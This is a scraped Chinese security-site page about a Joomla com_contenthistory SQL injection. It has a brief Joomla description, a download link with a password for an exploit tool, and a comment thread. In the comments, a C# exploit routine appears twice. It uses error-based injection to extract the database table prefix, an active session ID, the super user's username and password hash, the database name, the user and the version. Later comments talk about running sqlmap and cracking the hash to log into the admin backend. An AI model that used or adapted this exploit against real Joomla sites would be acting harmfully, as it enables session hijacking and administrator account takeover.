文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理等一些基本功能外,还可以通过其提供的上千个插件进行功能扩展。同时它还支持多种语言,由于它的功能非常强大,语言支持强,因此在全世界范围内都有很广泛的应用。
漏洞技术分析:http://www.freebuf.com/articles/82811.html
百度网盘 密码:htmo
*本文作者:菊花,来源:heresec,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)
-
FreeBuf-is-s-b果然是这个样子。。
稳定的exploit可不是这个样子写的哦
public void run()
{
string text = "Duplicate entry '";
string text2 = "' for key";
string text3 = this.textBox1.Text;
string data = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from jml_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
string text4 = "FROM `";
string text5 = "_ucm_history`";
Regex regex = new Regex(string.Concat(new string[]
{
"(?<=(",
text4,
"))[.\\s\\S]*?(?=(",
text5,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value = regex.Match(this.sendPost(data)).Value;
this.textBox3.Text = value;
string data2 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from " + value + "_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex2 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value2 = regex2.Match(this.sendPost(data2)).Value;
this.textBox2.Text = value2;
string data3 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(username)) from " + value + "_users where name='super user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex3 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value3 = regex3.Match(this.sendPost(data3)).Value;
this.textBox4.Text = value3;
string data4 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(password)) from " + value + "_users where name='super user' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex4 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value4 = regex4.Match(this.sendPost(data4)).Value;
this.textBox5.Text = value4;
string data5 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select database())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex5 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value5 = regex5.Match(this.sendPost(data5)).Value;
this.textBox6.Text = value5;
string data6 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select user())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex6 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value6 = regex6.Match(this.sendPost(data6)).Value;
this.textBox7.Text = value6;
string data7 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select version())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex7 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value7 = regex7.Match(this.sendPost(data7)).Value;
this.textBox8.Text = value7;
}
关注我们 分享每日精选文章
不容错过
- 如何在网络中追踪入侵者(二):高阶模式老王隔壁的白帽子2016-05-11
- 关于专业黑客组织「隐秘山猫」的详细报告jobs2013-10-11
- StringBleed:SNMP协议“上帝模式”漏洞影响多种网络设备clouds2017-05-01
- 【已结束】SyScan360国际前瞻信息安全会议图文直播(Live)孙毛毛2016-11-25
Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
0daybank
已有 11 条评论
感谢分享 晚上试试
搞笑。
这真的是fb?
运行了都是啥不是有效的win32程序
是解码,还是构造reset呢?
扑哧,我来试试,看截图,明显少了某重要的参数
果然是这个样子。。
稳定的exploit可不是这个样子写的哦
public void run()
{
string text = "Duplicate entry ‘";
string text2 = "’ for key";
string text3 = this.textBox1.Text;
string data = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from jml_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
string text4 = "FROM `";
string text5 = "_ucm_history`";
Regex regex = new Regex(string.Concat(new string[]
{
"(?<=(",
text4,
"))[.\\s\\S]*?(?=(",
text5,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value = regex.Match(this.sendPost(data)).Value;
this.textBox3.Text = value;
string data2 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(session_id)) from " + value + "_session limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex2 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value2 = regex2.Match(this.sendPost(data2)).Value;
this.textBox2.Text = value2;
string data3 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(username)) from " + value + "_users where name=’super user’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex3 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value3 = regex3.Match(this.sendPost(data3)).Value;
this.textBox4.Text = value3;
string data4 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select concat(password)) from " + value + "_users where name=’super user’ limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex4 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value4 = regex4.Match(this.sendPost(data4)).Value;
this.textBox5.Text = value4;
string data5 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select database())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex5 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value5 = regex5.Match(this.sendPost(data5)).Value;
this.textBox6.Text = value5;
string data6 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select user())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex6 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value6 = regex6.Match(this.sendPost(data6)).Value;
this.textBox7.Text = value6;
string data7 = text3 + "/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select 1 from(select count(*),concat((select (select version())),floor(rand(0)*2))x from information_schema.tables group by x)a)";
Regex regex7 = new Regex(string.Concat(new string[]
{
"(?<=(",
text,
"))[.\\s\\S]*?(?=(",
text2,
"))"
}), RegexOptions.Multiline | RegexOptions.Singleline);
string value7 = regex7.Match(this.sendPost(data7)).Value;
this.textBox8.Text = value7;
}
sqlmap构造构造就行了
然而并不能解密hash,求大神教我如何登陆后台
没有hash,有JB用
下载下来试试看先